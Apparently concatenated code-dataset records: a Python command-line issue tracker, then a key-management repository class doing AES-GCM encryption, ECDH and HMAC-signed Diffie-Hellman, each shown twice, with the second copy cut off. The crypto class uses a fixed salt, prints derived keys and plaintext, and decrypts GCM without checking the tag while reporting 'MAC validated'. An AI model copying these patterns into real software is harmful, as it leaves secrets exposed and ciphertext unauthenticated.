<filename>pyclitr.py<gh_stars>0 #! /usr/bin/env python3 # ^ ######## Import ######## import os, sys, uuid, json, pwd, copy from datetime import datetime ######## Functions ######## def json_dump (inp): return json.dumps(inp, sort_keys=True, indent=2) def create_json_file (filename): handle = open (filename + '.json', "w") handle.write("{}") handle.close() def read_json (filename): handle = open (filename + '.json', "r") content = json.loads(handle.read()) handle.close() return content def write_json_file (filename, content): handle = open (filename + '.json', "w") handle.write(json_dump(content)) handle.close() def print_help (): print ("Help for pyclitr\n") print("{:<20} {:<20} {:<35}".format("Command", "", "Description")) print("{:<20} {:<20} {:<35}".format("init", "", "Inititalize pyclitr for the current directory")) print("{:<20} {:<20} {:<35}".format("ls", "", "List all pending issues")) print("{:<20} {:<20} {:<35}".format("pending", "", "alias for ls")) print("{:<20} {:<20} {:<35}".format("completed", "", "List all completed issues")) print("{:<20} {:<20} {:<35}".format("add", "<>", "Adds a new issue with the given name. Additional values can be set, e.g. 
with project:test.")) print("{:<20} {:<20} {:<35}".format("delete", "<uuid>", "Delete issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("modify", "<uuid>", "Modify issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("complete", "<uuid>", "Mark issue with specified uuid as completed")) def note_edit (uuid, old, new): global pyclitr_dir edits = read_json(pyclitr_dir + 'edits') if not uuid in edits: edits[uuid] = [] edits[uuid].append({'editor' : pwd.getpwuid(os.getuid()).pw_name, 'time' : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'from' : old, 'to' : new}) write_json_file(pyclitr_dir + "edits", edits) def dict_changes (first, second): for key, value in second.items(): if key not in first: print ("Added " + key + str(value)) elif value != first[key]: print ("Changed " + key + " from '" + str(first[key]) + "' to '" + str(value) + "'") if True == False: if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") # Set basic variables cwd = os.getcwd() + '/' pyclitr_dir = cwd + '.pyclitr/' # Check if pyclitr has been initialized for this directory if os.path.isdir (pyclitr_dir): initialized = True else: initialized = False if initialized == False: if not len(sys.argv) > 1: print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif not sys.argv[1] == 'init': print ("Hidden directory .pyclitr does not exist. 
To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1] == 'pending' or len(sys.argv) == 2 and sys.argv[1] == 'completed': if len(sys.argv) == 2 and sys.argv[1] == 'completed': issues = read_json(pyclitr_dir + "completed") else: issues = read_json(pyclitr_dir + "pending") order = ['entry', 'description', 'creator', 'project', 'uuid', 'assign', 'due'] print("\033[4m{:<10}\033[0m \033[4m{:<45}\033[0m \033[4m{:<10}\033[0m \033[4m{:<15}\033[0m \033[4m{:<36}\033[0m \033[4m{:<10}\033[0m \033[4m{:<10}\033[0m".format(order[0], order[1], order[2], order[3], order[4], order[5], order[6])) for iuuid, issue in issues.items(): print("{:<10} {:<45} {:<10} {:<15} {:<36} {:<10} {:<10}".format(issue[order[0]][0:10], issue[order[1]], issue[order[2]], issue[order[3]], iuuid, issue[order[5]], issue[order[6]])) if len(sys.argv) == 2: if sys.argv[1] == 'init': os.mkdir (pyclitr_dir) open(pyclitr_dir + 'config', 'a').close() create_json_file (pyclitr_dir + 'pending') create_json_file (pyclitr_dir + 'completed') create_json_file (pyclitr_dir + 'edits') print ("Initialized at .pyclitr") elif sys.argv[1] == 'help': print_help() if len(sys.argv) == 3 and sys.argv[1] == 'show': issues = read_json(pyclitr_dir + 'pending') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: issues = read_json(pyclitr_dir + 'completed') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") print("\033[4m{:<20}\033[0m \033[4m{:<35}\033[0m".format("Name", "Value")) print("{:<20} {:<35}".format("UUID", sys.argv[2])) for key, value in issue.items(): if key != 'annotation' and value != '': print("{:<20} {:<35}".format(key, value)) # Display edits if there are any edits = read_json (pyclitr_dir + "edits") if sys.argv[2] in edits: for i in edits[sys.argv[2]]: print ("\n\033[1m" + i['editor'] + "\033[0m edited this task on \033[4m" + i['time'] + "\033[0m:") dict_changes (i['from'], i['to']) if 
len(sys.argv) > 2 and sys.argv[1] == 'add': pending = read_json(pyclitr_dir + 'pending') iuuid = str(uuid.uuid1()) issue = {"entry" : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), "creator" : pwd.getpwuid(os.getuid()).pw_name, 'annotation' : [], 'project' : '', 'status' : 'pending', 'assign' : '', 'due' : ''} args = sys.argv[2:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " issue['description'] = str(title).strip(" ") pending[iuuid] = issue write_json_file (pyclitr_dir + "pending", pending) print ("Issue \033[1m" + title + "\033[0m added") if len(sys.argv) > 2 and sys.argv[1] == 'modify': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) args = sys.argv[3:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " if title != '': issue['description'] = str(title).strip(" ") issues[sys.argv[2]] = issue write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m modified") note_edit(sys.argv[2], original, issue) if len(sys.argv) > 2 and sys.argv[1] == 'complete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) issue['status'] = 'completed' completed = read_json(pyclitr_dir + "completed") 
completed[sys.argv[2]] = issue write_json_file (pyclitr_dir + "completed", completed) del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m moved to completed") note_edit(sys.argv[2], original, issue) if len(sys.argv) == 3 and sys.argv[1] == 'delete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues)
<filename>pyclitr.py<gh_stars>0 #! /usr/bin/env python3 # ^ ######## Import ######## import os, sys, uuid, json, pwd, copy from datetime import datetime ######## Functions ######## def json_dump (inp): return json.dumps(inp, sort_keys=True, indent=2) def create_json_file (filename): handle = open (filename + '.json', "w") handle.write("{}") handle.close() def read_json (filename): handle = open (filename + '.json', "r") content = json.loads(handle.read()) handle.close() return content def write_json_file (filename, content): handle = open (filename + '.json', "w") handle.write(json_dump(content)) handle.close() def print_help (): print ("Help for pyclitr\n") print("{:<20} {:<20} {:<35}".format("Command", "", "Description")) print("{:<20} {:<20} {:<35}".format("init", "", "Inititalize pyclitr for the current directory")) print("{:<20} {:<20} {:<35}".format("ls", "", "List all pending issues")) print("{:<20} {:<20} {:<35}".format("pending", "", "alias for ls")) print("{:<20} {:<20} {:<35}".format("completed", "", "List all completed issues")) print("{:<20} {:<20} {:<35}".format("add", "<>", "Adds a new issue with the given name. Additional values can be set, e.g. 
with project:test.")) print("{:<20} {:<20} {:<35}".format("delete", "<uuid>", "Delete issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("modify", "<uuid>", "Modify issue with specified uuid")) print("{:<20} {:<20} {:<35}".format("complete", "<uuid>", "Mark issue with specified uuid as completed")) def note_edit (uuid, old, new): global pyclitr_dir edits = read_json(pyclitr_dir + 'edits') if not uuid in edits: edits[uuid] = [] edits[uuid].append({'editor' : pwd.getpwuid(os.getuid()).pw_name, 'time' : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), 'from' : old, 'to' : new}) write_json_file(pyclitr_dir + "edits", edits) def dict_changes (first, second): for key, value in second.items(): if key not in first: print ("Added " + key + str(value)) elif value != first[key]: print ("Changed " + key + " from '" + str(first[key]) + "' to '" + str(value) + "'") if True == False: if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") # Set basic variables cwd = os.getcwd() + '/' pyclitr_dir = cwd + '.pyclitr/' # Check if pyclitr has been initialized for this directory if os.path.isdir (pyclitr_dir): initialized = True else: initialized = False if initialized == False: if not len(sys.argv) > 1: print ("Hidden directory .pyclitr does not exist. To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif not sys.argv[1] == 'init': print ("Hidden directory .pyclitr does not exist. 
To set up pyclitr, use 'pyclitr init'\n\n") print_help() elif len(sys.argv) == 1 or len(sys.argv) == 2 and sys.argv[1] == 'pending' or len(sys.argv) == 2 and sys.argv[1] == 'completed': if len(sys.argv) == 2 and sys.argv[1] == 'completed': issues = read_json(pyclitr_dir + "completed") else: issues = read_json(pyclitr_dir + "pending") order = ['entry', 'description', 'creator', 'project', 'uuid', 'assign', 'due'] print("\033[4m{:<10}\033[0m \033[4m{:<45}\033[0m \033[4m{:<10}\033[0m \033[4m{:<15}\033[0m \033[4m{:<36}\033[0m \033[4m{:<10}\033[0m \033[4m{:<10}\033[0m".format(order[0], order[1], order[2], order[3], order[4], order[5], order[6])) for iuuid, issue in issues.items(): print("{:<10} {:<45} {:<10} {:<15} {:<36} {:<10} {:<10}".format(issue[order[0]][0:10], issue[order[1]], issue[order[2]], issue[order[3]], iuuid, issue[order[5]], issue[order[6]])) if len(sys.argv) == 2: if sys.argv[1] == 'init': os.mkdir (pyclitr_dir) open(pyclitr_dir + 'config', 'a').close() create_json_file (pyclitr_dir + 'pending') create_json_file (pyclitr_dir + 'completed') create_json_file (pyclitr_dir + 'edits') print ("Initialized at .pyclitr") elif sys.argv[1] == 'help': print_help() if len(sys.argv) == 3 and sys.argv[1] == 'show': issues = read_json(pyclitr_dir + 'pending') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: issues = read_json(pyclitr_dir + 'completed') if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") print("\033[4m{:<20}\033[0m \033[4m{:<35}\033[0m".format("Name", "Value")) print("{:<20} {:<35}".format("UUID", sys.argv[2])) for key, value in issue.items(): if key != 'annotation' and value != '': print("{:<20} {:<35}".format(key, value)) # Display edits if there are any edits = read_json (pyclitr_dir + "edits") if sys.argv[2] in edits: for i in edits[sys.argv[2]]: print ("\n\033[1m" + i['editor'] + "\033[0m edited this task on \033[4m" + i['time'] + "\033[0m:") dict_changes (i['from'], i['to']) if 
len(sys.argv) > 2 and sys.argv[1] == 'add': pending = read_json(pyclitr_dir + 'pending') iuuid = str(uuid.uuid1()) issue = {"entry" : datetime.now().strftime('%Y-%m-%d %H:%M:%S'), "creator" : pwd.getpwuid(os.getuid()).pw_name, 'annotation' : [], 'project' : '', 'status' : 'pending', 'assign' : '', 'due' : ''} args = sys.argv[2:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " issue['description'] = str(title).strip(" ") pending[iuuid] = issue write_json_file (pyclitr_dir + "pending", pending) print ("Issue \033[1m" + title + "\033[0m added") if len(sys.argv) > 2 and sys.argv[1] == 'modify': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) args = sys.argv[3:] title = '' for i in args: attr = i.split(":") if (len(attr) == 2): issue[str(attr[0])] = str(attr[1]) else: title = title + i + " " if title != '': issue['description'] = str(title).strip(" ") issues[sys.argv[2]] = issue write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m modified") note_edit(sys.argv[2], original, issue) if len(sys.argv) > 2 and sys.argv[1] == 'complete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") original = copy.copy(issue) issue['status'] = 'completed' completed = read_json(pyclitr_dir + "completed") 
completed[sys.argv[2]] = issue write_json_file (pyclitr_dir + "completed", completed) del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues) print ("Issue \033[1m" + sys.argv[2] + " (" + issue['description'] + ")" + "\033[0m moved to completed") note_edit(sys.argv[2], original, issue) if len(sys.argv) == 3 and sys.argv[1] == 'delete': # Check whether this issue is pending or completed status = 'pending' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: status = 'completed' issues = read_json(pyclitr_dir + status) if sys.argv[2] in issues: issue = issues[sys.argv[2]] else: sys.exit("No item with this uuid has been found.") del issues[sys.argv[2]] write_json_file (pyclitr_dir + status, issues)
en
0.745842
#! /usr/bin/env python3 # ^ ######## Import ######## ######## Functions ######## # Set basic variables # Check if pyclitr has been initialized for this directory # Display edits if there are any # Check whether this issue is pending or completed # Check whether this issue is pending or completed # Check whether this issue is pending or completed
2.548967
3
src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py
parada3desu/foxy-key-broker
0
6623566
<filename>src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py<gh_stars>0 import sys from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives._serialization import PublicFormat, Encoding from cryptography.hazmat.primitives.asymmetric import dh from cryptography.hazmat.primitives.asymmetric import ec from cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_parameters from src.contexts.kms.computed_data.domain.entities.ComputedData import ComputedData from src.contexts.kms.computed_data.domain.entities.ComputedDataInput import ComputedDataInput from src.contexts.kms.computed_data.domain.entities.ComputedDataMeta import ComputedDataMeta from src.contexts.kms.computed_data.domain.entities.ComputedDataOutput import ComputedDataOutput from src.contexts.kms.computed_data.domain.entities.ComputedDataType import ComputedDataType, ComputedDataTypes from src.contexts.kms.computed_data.domain.repositories.ComputedDataRepository import ComputedDataRepository from src.contexts.kms.cryptokeys.domain.entities.CryptoKey import CryptoKey from src.contexts.kms.cryptokeys.domain.entities.CryptoKeyType import CryptoKeyTypes from src.contexts.shared.domain.BaseObject import BaseObject class AllAlgorithmComputedDataRepository(BaseObject, ComputedDataRepository): async def find_one_by_crypto_key_and_input(self, key: CryptoKey, input: ComputedDataInput, cd_type: ComputedDataType) -> ComputedData: output = input.value() meta = {} if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_ELLIPTIC_CURVE.value: output, meta = await self.ecdh_get_shared_key_platform(key.payload.value()) if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_HMAC.value: parameters = key.parameters.value() dh_parameters = parameters['parameters'] signature = parameters['signature'] output, meta = await 
self.hmac_DH_GetSharedKey_Platform(dh_parameters, key.payload.value(), signature) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.encryption_AE(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.decrypt_AE(key.payload.value(), text, nonce) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.Encryption_AEAD(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.Decrypt_AEAD(text, key.payload.value(), nonce) data = ComputedData( input, ComputedDataOutput(output), key.id, cd_type, ComputedDataMeta(meta), ) return data async def Encryption_AEAD(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext = cipher.encrypt(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() print("\nMensaje transmitido: " + str(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', {'nonce': nonce.hex()} async def Decrypt_AEAD(self, transmitted_message: str, passphrase: str, nonce: str) -> str: received_kdf_salt = 
b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" received_msg = transmitted_message print("Mensaje recibido: " + str(received_msg)) received_ciphertext = received_msg # Generate decryption key from passphrase and salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) cipher = AES.new(decryption_key, AES.MODE_GCM, bytes.fromhex(nonce)) try: decrypted_data = cipher.decrypt(bytes.fromhex(received_ciphertext)) print("\nMAC validated: Data was encrypted by someone with the shared secret passphrase") print("All allies have passphrase - SYMMETRIC encryption!!!") print("Data descifrada: " + str(decrypted_data)) except Exception as e: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return (decrypted_data).decode(), {} async def encryption_AE(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext, tag = cipher.encrypt_and_digest(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() meta = { 'tag': tag.hex(), 'nonce': nonce.hex(), } print("\nMensaje transmitido: " + str(transmitted_message)) print(type(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', meta async def decrypt_AE(self, passphrase: str, transmitted_message: str, nonce: str): received_msg = transmitted_message print("\nMensaje recibido: " + str(received_msg)) received_kdf_salt = 
b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" # Key derivation received_ciphertext, received_nonce = bytes.fromhex(transmitted_message), bytes.fromhex(nonce) # Generar decryption key con la contraseña y salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar cipher = AES.new(decryption_key, AES.MODE_GCM, received_nonce) try: decrypted_data = cipher.decrypt(received_ciphertext) print("Data descifrada: " + str(decrypted_data)) except ValueError as mac_mismatch: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return decrypted_data.decode('utf-8'), {} async def ecdh_get_shared_key_platform(self, public_key_IoT: str) -> (str, dict): # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) private_key = ec.generate_private_key(ec.SECP384R1()) public_key = private_key.public_key() str_public_key = public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo).decode('utf-8') # 1. Obtener clave pública en string de la bd y pasar a objeto key public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Returns shared key platform shared_key = private_key.exchange(ec.ECDH(), loaded_public_key_IoT) return shared_key.hex(), {'generated-public-key': str_public_key} async def hmac_DH_GetSharedKey_Platform(self, dh_parameters: str, public_key_IoT: str, pk_signature: str) -> ( str, dict): # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. 
Conversión a bytes y deserialización de parámetros dh_parameters_pem = dh_parameters.encode("utf-8") loaded_dh_params = load_pem_parameters(dh_parameters_pem) # 2. Conversión a bytes y deserialización de clave pública IoT public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Comprueba que la clave pública del IoT es correcta if (not isinstance(loaded_dh_params, dh.DHParameters) or not isinstance(loaded_public_key_IoT, dh.DHPublicKey)): sys.exit('Protocol error: Platform received a wrong message!') # Comprueba la autenticidad con la HMAC recibida h_IoT = hmac.HMAC(public_key_IoT_pem, hashes.SHA256()) h_IoT.update(b"Platform public key hash") h_IoT.verify(bytes.fromhex(pk_signature)) # 3. Plataforma genera sus propias claves privadas y públicas platform_private_key = loaded_dh_params.generate_private_key() platform_public_key = platform_private_key.public_key() # El KMS debe guardar esta clave pública junto con los parámetros y str_signature en la bbdd con id platform-HMACDH platform_pk_pem = platform_public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo) str_platform_pk = platform_pk_pem.decode('utf-8') # HMAC h = hmac.HMAC(platform_pk_pem, hashes.SHA256()) h.update(b"Platform public key hash") signature = h.finalize() str_signature = signature.hex() shared_key = platform_private_key.exchange(loaded_public_key_IoT) # Devuelve la clave en string, el IoT debe enviar al KMS luego de nuevo esta clave para que la almacene return shared_key.hex(), {'generated-public-key': str_platform_pk, 'signature': str_signature, 'parameters': dh_parameters}
<filename>src/contexts/kms/computed_data/infrastructure/persistence/AllAlgorithmComputedDataRepository.py<gh_stars>0 import sys from Crypto.Cipher import AES from Crypto.Protocol.KDF import PBKDF2 from cryptography.hazmat.primitives import hashes, hmac from cryptography.hazmat.primitives._serialization import PublicFormat, Encoding from cryptography.hazmat.primitives.asymmetric import dh from cryptography.hazmat.primitives.asymmetric import ec from cryptography.hazmat.primitives.serialization import load_pem_public_key, load_pem_parameters from src.contexts.kms.computed_data.domain.entities.ComputedData import ComputedData from src.contexts.kms.computed_data.domain.entities.ComputedDataInput import ComputedDataInput from src.contexts.kms.computed_data.domain.entities.ComputedDataMeta import ComputedDataMeta from src.contexts.kms.computed_data.domain.entities.ComputedDataOutput import ComputedDataOutput from src.contexts.kms.computed_data.domain.entities.ComputedDataType import ComputedDataType, ComputedDataTypes from src.contexts.kms.computed_data.domain.repositories.ComputedDataRepository import ComputedDataRepository from src.contexts.kms.cryptokeys.domain.entities.CryptoKey import CryptoKey from src.contexts.kms.cryptokeys.domain.entities.CryptoKeyType import CryptoKeyTypes from src.contexts.shared.domain.BaseObject import BaseObject class AllAlgorithmComputedDataRepository(BaseObject, ComputedDataRepository): async def find_one_by_crypto_key_and_input(self, key: CryptoKey, input: ComputedDataInput, cd_type: ComputedDataType) -> ComputedData: output = input.value() meta = {} if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_ELLIPTIC_CURVE.value: output, meta = await self.ecdh_get_shared_key_platform(key.payload.value()) if key.type.value() == CryptoKeyTypes.DIFFIE_HELLMAN_HMAC.value: parameters = key.parameters.value() dh_parameters = parameters['parameters'] signature = parameters['signature'] output, meta = await 
self.hmac_DH_GetSharedKey_Platform(dh_parameters, key.payload.value(), signature) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.encryption_AE(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AE.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.decrypt_AE(key.payload.value(), text, nonce) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.ENCRYPT.value: output, meta = await self.Encryption_AEAD(key.payload.value(), input.value()) if key.type.value() == CryptoKeyTypes.AEAD.value and cd_type.value() == ComputedDataTypes.DECRYPT.value: text, nonce = tuple(input.value().split('@')) output, meta = await self.Decrypt_AEAD(text, key.payload.value(), nonce) data = ComputedData( input, ComputedDataOutput(output), key.id, cd_type, ComputedDataMeta(meta), ) return data async def Encryption_AEAD(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext = cipher.encrypt(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() print("\nMensaje transmitido: " + str(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', {'nonce': nonce.hex()} async def Decrypt_AEAD(self, transmitted_message: str, passphrase: str, nonce: str) -> str: received_kdf_salt = 
b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" received_msg = transmitted_message print("Mensaje recibido: " + str(received_msg)) received_ciphertext = received_msg # Generate decryption key from passphrase and salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) cipher = AES.new(decryption_key, AES.MODE_GCM, bytes.fromhex(nonce)) try: decrypted_data = cipher.decrypt(bytes.fromhex(received_ciphertext)) print("\nMAC validated: Data was encrypted by someone with the shared secret passphrase") print("All allies have passphrase - SYMMETRIC encryption!!!") print("Data descifrada: " + str(decrypted_data)) except Exception as e: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return (decrypted_data).decode(), {} async def encryption_AE(self, passphrase: str, sensitive_data: str): # Key generation key_gen = b"/\<KEY>" # Key derivation key = PBKDF2(passphrase, key_gen) # Contraseña basada en key derivation print("AES Encryption Key: " + str(key)) # Data sensitiva para cifrar print("Data enviada para cifrar: " + "\n" + str(sensitive_data)) # Encriptación usando AES GCM cipher = AES.new(key, AES.MODE_GCM) # https://pycryptodome.readthedocs.io/en/latest/src/cipher/aes.html ciphertext, tag = cipher.encrypt_and_digest(sensitive_data.encode('utf-8')) nonce = cipher.nonce # Mensaje transmitido # ciphertext: resultado de los datos cifrados, # tag: Codigo de autenticacion de mensajes MAC # nonce: vector de inicializacion (solo ocurre una vez) transmitted_message = ciphertext.hex() meta = { 'tag': tag.hex(), 'nonce': nonce.hex(), } print("\nMensaje transmitido: " + str(transmitted_message)) print(type(transmitted_message)) return f'{transmitted_message}@{nonce.hex()}', meta async def decrypt_AE(self, passphrase: str, transmitted_message: str, nonce: str): received_msg = transmitted_message print("\nMensaje recibido: " + str(received_msg)) received_kdf_salt = 
b"/\x84F\xc5\xddA^k\xd2.C\x19'\x1a2\x9c" # Key derivation received_ciphertext, received_nonce = bytes.fromhex(transmitted_message), bytes.fromhex(nonce) # Generar decryption key con la contraseña y salt decryption_key = PBKDF2(passphrase, received_kdf_salt) print("Decryption Key: " + str(decryption_key)) # Validar MAC y descifrar, si la validación MAC falla, ValueError exception se va a mostrar cipher = AES.new(decryption_key, AES.MODE_GCM, received_nonce) try: decrypted_data = cipher.decrypt(received_ciphertext) print("Data descifrada: " + str(decrypted_data)) except ValueError as mac_mismatch: print("\nFallo de la validación MAC durante la desencriptación. Auntenticación no garantizada") return decrypted_data.decode('utf-8'), {} async def ecdh_get_shared_key_platform(self, public_key_IoT: str) -> (str, dict): # Input para shared key Platform: ID clave pública IoT # Returns shared key IoT # Plataforma genera su clave pública y privada (y la pública se almacena en la bbdd para el IoT) private_key = ec.generate_private_key(ec.SECP384R1()) public_key = private_key.public_key() str_public_key = public_key.public_bytes(Encoding.PEM, PublicFormat.SubjectPublicKeyInfo).decode('utf-8') # 1. Obtener clave pública en string de la bd y pasar a objeto key public_key_IoT_pem = public_key_IoT.encode('utf-8') loaded_public_key_IoT = load_pem_public_key(public_key_IoT_pem) # Returns shared key platform shared_key = private_key.exchange(ec.ECDH(), loaded_public_key_IoT) return shared_key.hex(), {'generated-public-key': str_public_key} async def hmac_DH_GetSharedKey_Platform(self, dh_parameters: str, public_key_IoT: str, pk_signature: str) -> ( str, dict): # A la API le llega el id de la clave y de ahí saca el string de parámetros y de la public key del IoT # En este punto, el KMS ya tiene los dh_parameters y la clave pública en string y debe convertirlo al objeto original # 1. 
